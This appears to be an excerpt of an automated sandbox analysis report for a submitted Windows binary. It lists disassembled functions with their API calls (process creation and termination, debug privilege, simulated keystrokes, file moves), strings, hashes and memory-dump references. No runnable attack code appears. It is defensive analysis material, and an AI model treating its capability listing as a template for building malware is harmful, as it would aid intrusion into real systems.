Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 7c1f25bfff8ac1018f9e6f234db43efbe018bd579ef152aa76074a9d569561bb
Instruction ID: d0225402a176f8412f5a2e390e78047dfc83881e71e865a81f0af82dfcff8b5a
Opcode Fuzzy Hash: 7c1f25bfff8ac1018f9e6f234db43efbe018bd579ef152aa76074a9d569561bb
Instruction Fuzzy Hash: BC417FB1511318BFEB118F54CC89FFA7BACEF08354F00916AFA09BA141E7759E449BA0

Function 00E78C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E8F910), ref: 00E78D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E8F910), ref: 00E78D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E78ED6
SysFreeString.OLEAUT32(?), ref: 00E78F00

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 18591369a9e9c98b9c25bcefea7b20bd781d54161a8b708422d4f24633733920
Instruction ID: fa03a5fd32608d09d996e38965d99d5625f8d417d444f3ef01652820f38710a3
Opcode Fuzzy Hash: 18591369a9e9c98b9c25bcefea7b20bd781d54161a8b708422d4f24633733920
Instruction Fuzzy Hash: 67F12571A00209AFCF14DF94C988EAEB7B9FF59314F109498F909BB251DB31AE45CB61

Function 00E7F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E7F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E7FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00E7FA7C
CloseHandle.KERNEL32(?), ref: 00E7FAAB
CloseHandle.KERNEL32(?), ref: 00E7FB22

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 785a905f64c32ac27f81307dace1c312e6348d832685bcf020b49d5a9945d72a
Instruction ID: 3b6acb9b86a834702d06f6912f55a12ef2e231f4063a949fe3b6cd6173379db4
Opcode Fuzzy Hash: 785a905f64c32ac27f81307dace1c312e6348d832685bcf020b49d5a9945d72a
Instruction Fuzzy Hash: 95E1AF716043009FCB14EF24D891B6ABBE1BF85354F14D96DF899AB2A2DB30DC85CB52

Function 00E64CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E6466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E63697,?), ref: 00E6468B

Part of subcall function 00E6466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E63697,?), ref: 00E646A4

Part of subcall function 00E64A31: GetFileAttributesW.KERNEL32(?,00E6370B), ref: 00E64A32

lstrcmpiW.KERNEL32(?,?), ref: 00E64D40
_wcscmp.LIBCMT ref: 00E64D5A
MoveFileW.KERNEL32(?,?), ref: 00E64D75

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: e4c5ceceb3d854b9d96157f94ceeebcd1a7d0af85a6e758dd8a7c462dea82e61
Instruction ID: 5c042b3b578e5511e0bec7feca7b4e7952870a69965cfabad7412aff6fa1a600
Opcode Fuzzy Hash: e4c5ceceb3d854b9d96157f94ceeebcd1a7d0af85a6e758dd8a7c462dea82e61
Instruction Fuzzy Hash: 6A5166B25483459BC725EBA0E8819DF73ECAF85354F00192EF289E3191EF35A588C766

Function 00E88645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E886FF

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: b089b370f18ac6477e7d6ad6f8aa9a25d8ec1d908955afcd73e399c8966e0519
Instruction ID: 7489cc57187955f9a2f919154e6445152e1294aaa37149578a427a261f52ef5a
Opcode Fuzzy Hash: b089b370f18ac6477e7d6ad6f8aa9a25d8ec1d908955afcd73e399c8966e0519
Instruction Fuzzy Hash: 7651A470500244BFEB24AB25CE89F997BA4AB05324FE02126FD5DF61E0DF72A980DB40

Function 00E02B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E3C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E3C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E3C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E3C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E3C370
DestroyIcon.USER32(00000000), ref: 00E3C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E3C39C
DestroyIcon.USER32(?), ref: 00E3C3AB

Part of subcall function 00E8A4AF: DeleteObject.GDI32(00000000), ref: 00E8A4E8

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: fd015a9329a28d7c373dac0f12489039fd370a213c6227aa71531cdb756e48e8
Instruction ID: 903ef2d9e0df0bd2f365dfe6b6dcd6f2b0ebe73950f395a1596d8614d98968a4
Opcode Fuzzy Hash: fd015a9329a28d7c373dac0f12489039fd370a213c6227aa71531cdb756e48e8
Instruction Fuzzy Hash: 8A516971600205AFDB24DF65CC49FAA7BE5EB58314F205529FA06B72E0D771EC90DB50

Function 00E5966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E5A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E5A84C
Part of subcall function 00E5A82C: GetCurrentThreadId.KERNEL32 ref: 00E5A853
Part of subcall function 00E5A82C: AttachThreadInput.USER32(00000000,?,00E59683,?,00000001), ref: 00E5A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 00E5968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E596AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00E596AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 00E596B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E596D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E596D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 00E596E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E596F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E596FB

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 5635755b1de73c8a897df2ac3abbb48eb556af2252eec3134f7b8bcb8e2d99f1
Instruction ID: c5f02bc006f01e968c92be300f1841f7584aafa9150be3eff1a5308871253dea
Opcode Fuzzy Hash: 5635755b1de73c8a897df2ac3abbb48eb556af2252eec3134f7b8bcb8e2d99f1
Instruction Fuzzy Hash: 2011CEB1A10218BEF6106B619C8DFAA3B6DEB4C751F101525F648BB0A1C9F25C149BA4

Function 00E58921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E5853C,00000B00,?,?), ref: 00E5892A
HeapAlloc.KERNEL32(00000000,?,00E5853C,00000B00,?,?), ref: 00E58931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E5853C,00000B00,?,?), ref: 00E58946
GetCurrentProcess.KERNEL32(?,00000000,?,00E5853C,00000B00,?,?), ref: 00E5894E
DuplicateHandle.KERNEL32(00000000,?,00E5853C,00000B00,?,?), ref: 00E58951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E5853C,00000B00,?,?), ref: 00E58961
GetCurrentProcess.KERNEL32(00E5853C,00000000,?,00E5853C,00000B00,?,?), ref: 00E58969
DuplicateHandle.KERNEL32(00000000,?,00E5853C,00000B00,?,?), ref: 00E5896C
CreateThread.KERNEL32(00000000,00000000,00E58992,00000000,00000000,00000000), ref: 00E58986

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: e99fd6595e7cfbd3f24dc8f362d73ccbfa21f52ce8e092e8a114ce4ff9ad136e
Instruction ID: 2b02a1f3436af1581194cfb5bf3869653c3249ed67fbc2b0e5387c9d9cc88673
Opcode Fuzzy Hash: e99fd6595e7cfbd3f24dc8f362d73ccbfa21f52ce8e092e8a114ce4ff9ad136e
Instruction Fuzzy Hash: 3801BF75641304FFE710ABA5DC8DF677B6CEB89711F404421FA09EB1A2CA74D814CB20

Function 00E79B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00E79BA4, 00E79EC8
Not an Object type, xrefs: 00E79B7B

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 5586ece4fde28ae759ec44fb86b70f3a597a8314bd0a400e5688b74aef149776
Instruction ID: 86976f168d5641f4255c19dbd0db2144d9a34ea00867d5f4c30800e8a5027c22
Opcode Fuzzy Hash: 5586ece4fde28ae759ec44fb86b70f3a597a8314bd0a400e5688b74aef149776
Instruction Fuzzy Hash: 37C19371A0021A9FDF10DF98D884AEEB7F5FF48314F149469E909BB282E770AD45CB90

Function 00E7975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00E5710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?,?,00E57455), ref: 00E57127
Part of subcall function 00E5710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?), ref: 00E57142
Part of subcall function 00E5710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?), ref: 00E57150
Part of subcall function 00E5710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?), ref: 00E57160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00E79806
_memset.LIBCMT ref: 00E79813
_memset.LIBCMT ref: 00E79956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00E79982
CoTaskMemFree.OLE32(?), ref: 00E7998D

Strings

NULL Pointer assignment, xrefs: 00E799DB

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: cd0906fcad3534c2ee71c4b992849ec43b8adb3aa0c2ebb02e47cb85477b3cf7
Instruction ID: 246cd723b006f71872ba3e743423912e0aed1ff5d1016d04d20338adfb7b7e4f
Opcode Fuzzy Hash: cd0906fcad3534c2ee71c4b992849ec43b8adb3aa0c2ebb02e47cb85477b3cf7
Instruction Fuzzy Hash: 8B912871D00229EBDB10DFA5DC41EDEBBB9AF48310F10916AF519B7291EB719A44CFA0

Function 00E86D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E86E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00E86E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E86E52
_wcscat.LIBCMT ref: 00E86EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00E86EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E86EF2

Strings

SysListView32, xrefs: 00E86DF6

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 96cf89c14e0f483dbd72b326e99d8be8a64fd262b13895556a211325b3119c7b
Instruction ID: 3b80253fdca9d53bf3c5415756a5fe7761ef2908750dd0bc53e8e8ef3771dcc9
Opcode Fuzzy Hash: 96cf89c14e0f483dbd72b326e99d8be8a64fd262b13895556a211325b3119c7b
Instruction Fuzzy Hash: 55419171A00348AFDB21AF64CC85BEEB7F8EF08354F10156AF68CB7291D6719D848B60

Function 00E7E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00E63C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00E63C7A
Part of subcall function 00E63C55: Process32FirstW.KERNEL32(00000000,?), ref: 00E63C88
Part of subcall function 00E63C55: CloseHandle.KERNEL32(00000000), ref: 00E63D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E7E9A4
GetLastError.KERNEL32 ref: 00E7E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E7E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 00E7EA63
GetLastError.KERNEL32(00000000), ref: 00E7EA6E
CloseHandle.KERNEL32(00000000), ref: 00E7EAA3

Strings

SeDebugPrivilege, xrefs: 00E7E9C2

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: cc6aaa3acce6bd3c40a4656be5d6caf6b71cd71f354fc33f04e0e2e41560e99a
Instruction ID: 24ec945d0725ff5e0d730cb959cac5f42815737aa5f7d9c3d34fe1138b07fae9
Opcode Fuzzy Hash: cc6aaa3acce6bd3c40a4656be5d6caf6b71cd71f354fc33f04e0e2e41560e99a
Instruction Fuzzy Hash: AE418A712002009FDB14EF64CC95B6AB7E5AF84314F049458F90AAB3D3DB70A848CB91

Function 00E62F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00E63033

Strings

warning, xrefs: 00E6301C
question, xrefs: 00E62FEC
info, xrefs: 00E62FD4
blank, xrefs: 00E62FB5
stop, xrefs: 00E63004

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 21cbcccc42824eab496c1a2665f49a9d81e147539ed0ab2dbd06363ccb85ffbc
Instruction ID: 86fde4b72344f71f0d705aeb31088e220817e9f7db8b32b83875515cee4919c8
Opcode Fuzzy Hash: 21cbcccc42824eab496c1a2665f49a9d81e147539ed0ab2dbd06363ccb85ffbc
Instruction Fuzzy Hash: 79112B31388346BEE7259A64FC42CEF779CDF253A4B20102EFA00B6282DB715F4856A4

Function 00E642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E64312
LoadStringW.USER32(00000000), ref: 00E64319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E6432F
LoadStringW.USER32(00000000), ref: 00E64336
_wprintf.LIBCMT ref: 00E6435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E6437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00E64357

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 3f789566a116ff4757182abfbdaabd9e0af036ff524130af4e2f54332771ab10
Instruction ID: 1bc15971d7786742e83483f7712fb7181ccfef8fb03040fb8fd7ec370c84e4d1
Opcode Fuzzy Hash: 3f789566a116ff4757182abfbdaabd9e0af036ff524130af4e2f54332771ab10
Instruction Fuzzy Hash: C90162F2940208BFE711A7A1DD89EFB776CEB08300F0005A1F749F2151EA749E894B70

Function 00E8D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623

GetSystemMetrics.USER32(0000000F), ref: 00E8D47C
GetSystemMetrics.USER32(0000000F), ref: 00E8D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00E8D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E8D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E8D716
ShowWindow.USER32(00000003,00000000), ref: 00E8D735
InvalidateRect.USER32(?,00000000,00000001), ref: 00E8D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 00E8D77D

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 9c78382b0dc236520007a43add7f77e9afc3bdde62e5e881e187bd86788f0ed0
Instruction ID: bf24ed9281eeffc5b694d643eb9fcaf18493817df72b4ce0e900cf045bce22e0
Opcode Fuzzy Hash: 9c78382b0dc236520007a43add7f77e9afc3bdde62e5e881e187bd86788f0ed0
Instruction Fuzzy Hash: 0DB1BC31604219EFDF18DF69C985BAD7BB1FF04705F08906AEC4CAB295E731A990DB90

Function 00E02A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E3C1C7,00000004,00000000,00000000,00000000), ref: 00E02ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00E3C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00E02B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00E3C1C7,00000004,00000000,00000000,00000000), ref: 00E3C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E3C1C7,00000004,00000000,00000000,00000000), ref: 00E3C286

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
